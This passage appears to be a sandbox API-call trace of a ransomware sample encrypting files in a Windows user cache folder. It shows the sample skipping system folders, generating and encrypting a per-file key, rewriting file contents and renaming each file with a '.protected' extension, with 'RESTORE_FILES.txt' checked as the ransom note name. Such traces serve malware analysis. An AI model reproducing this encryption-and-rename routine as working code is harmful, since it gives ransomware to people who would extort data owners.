(lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="Program Files") returned -1 [0089.183] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="Program Files (x86)") returned -1 [0089.183] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="$Recycle.bin") returned 1 [0089.183] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="System Volume Information") returned -1 [0089.183] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 152 [0089.184] StrStrIW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".protected") returned 0x0 [0089.184] lstrcmpW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="RESTORE_FILES.txt") returned -1 [0089.184] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.184] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 152 [0089.184] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".txt") returned 0x0 [0089.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 152 [0089.184] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".rar") returned 0x0 [0089.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 152 [0089.184] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".zip") returned 0x0 [0089.184] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.185] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.185] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.185] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.185] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.185] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.185] CloseHandle (hObject=0x150) returned 1 [0089.185] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.protected") returned 162 [0089.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.protected")) returned 1 [0089.186] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.186] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="Windows") returned -1 [0089.186] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="Program Files") returned -1 [0089.186] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="Program Files (x86)") returned -1 [0089.186] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="$Recycle.bin") returned 1 [0089.186] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="System Volume Information") returned -1 [0089.186] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 152 [0089.186] StrStrIW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".protected") returned 0x0 [0089.186] lstrcmpW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="RESTORE_FILES.txt") returned -1 [0089.186] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.186] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 152 [0089.187] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".txt") returned 0x0 [0089.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 152 [0089.187] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".rar") returned 0x0 [0089.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 152 [0089.187] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".zip") returned 0x0 [0089.187] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x198, lpOverlapped=0x0) returned 1 [0089.188] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.188] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x198, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x198, lpOverlapped=0x0) returned 1 [0089.188] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.188] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.188] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.188] CloseHandle (hObject=0x150) returned 1 [0089.188] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.protected") returned 162 [0089.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.protected")) returned 1 [0089.189] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.189] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="Windows") returned -1 [0089.189] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="Program Files") returned -1 [0089.189] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="Program Files (x86)") returned -1 [0089.189] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="$Recycle.bin") returned 1 [0089.189] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="System Volume Information") returned -1 [0089.189] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 152 [0089.189] StrStrIW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".protected") returned 0x0 [0089.189] lstrcmpW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="RESTORE_FILES.txt") returned -1 [0089.189] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.189] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.190] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 152 [0089.190] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".txt") returned 0x0 [0089.190] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 152 [0089.190] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".rar") returned 0x0 [0089.190] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 152 [0089.190] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".zip") returned 0x0 [0089.190] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1a4, lpOverlapped=0x0) returned 1 [0089.191] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe5c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.191] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1a4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1a4, lpOverlapped=0x0) returned 1 [0089.191] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.191] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.191] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.191] CloseHandle (hObject=0x150) returned 1 [0089.191] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.protected") returned 162 [0089.191] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.protected")) returned 1 [0089.192] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.192] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="Windows") returned -1 [0089.192] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="Program Files") returned -1 [0089.192] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="Program Files (x86)") returned -1 [0089.192] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="$Recycle.bin") returned 1 [0089.192] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="System Volume Information") returned -1 [0089.192] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 152 [0089.192] StrStrIW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".protected") returned 0x0 [0089.192] lstrcmpW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="RESTORE_FILES.txt") returned -1 [0089.192] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.192] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.193] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 152 [0089.193] StrStrW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".txt") returned 0x0 [0089.193] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 152 [0089.193] StrStrW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".rar") returned 0x0 [0089.193] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 152 [0089.193] StrStrW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".zip") returned 0x0 [0089.193] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0089.194] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.194] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0089.194] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.194] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.194] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.194] CloseHandle (hObject=0x150) returned 1 [0089.194] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.protected") returned 162 [0089.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.protected")) returned 1 [0089.195] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.195] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="Windows") returned -1 [0089.195] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="Program Files") returned -1 [0089.195] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="Program Files (x86)") returned -1 [0089.195] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="$Recycle.bin") returned 1 [0089.195] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="System Volume Information") returned -1 [0089.195] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 152 [0089.195] StrStrIW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".protected") returned 0x0 [0089.195] lstrcmpW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="RESTORE_FILES.txt") returned -1 [0089.195] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.195] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 